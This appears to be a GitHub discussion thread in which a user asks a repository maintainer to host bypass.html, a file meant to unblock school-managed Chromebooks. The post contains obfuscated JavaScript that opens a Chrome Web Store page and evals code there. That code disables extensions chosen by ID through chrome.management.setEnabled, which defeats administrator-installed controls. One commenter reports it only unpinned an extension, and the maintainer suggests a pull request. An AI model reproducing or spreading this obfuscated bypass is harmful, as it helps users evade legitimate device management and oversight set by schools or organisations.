### DISCUSSION TITLE
add this to your repository pls

### DISCUSSION THREAD

**Discussion by phillipbruh** [3kh0/ext-remover#83] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
i think my last discussion was miss understood if you want to please add a file called bypass.html to your repository since most peoples javascript:// is blocked this file will unblock the chromebook without using javascript: im not asking you to make this a file and give it to me im asking you to make this a file and add it to your rep so others can use it (btw)

```
<script>
var bypass = window.open('https://chrome.google.com/webstorex');
bypass.eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('d(\'c b a: (9 8 7)\').6(\',\').5(0=>{4.3.2(0,!1)})',14,14,'i||setEnabled|management|chrome|forEach|split|commas|by|seperated|here|IDs|Extension|prompt|uninstall'.split('|'),0,{}))
</script>
```

**Comment by ghost** [comment]
it doesnt unblock my laptop it js unpinned the extension

**Comment by 3kh0** [comment, marked as answer]
@phillipbruh you can make a pull request
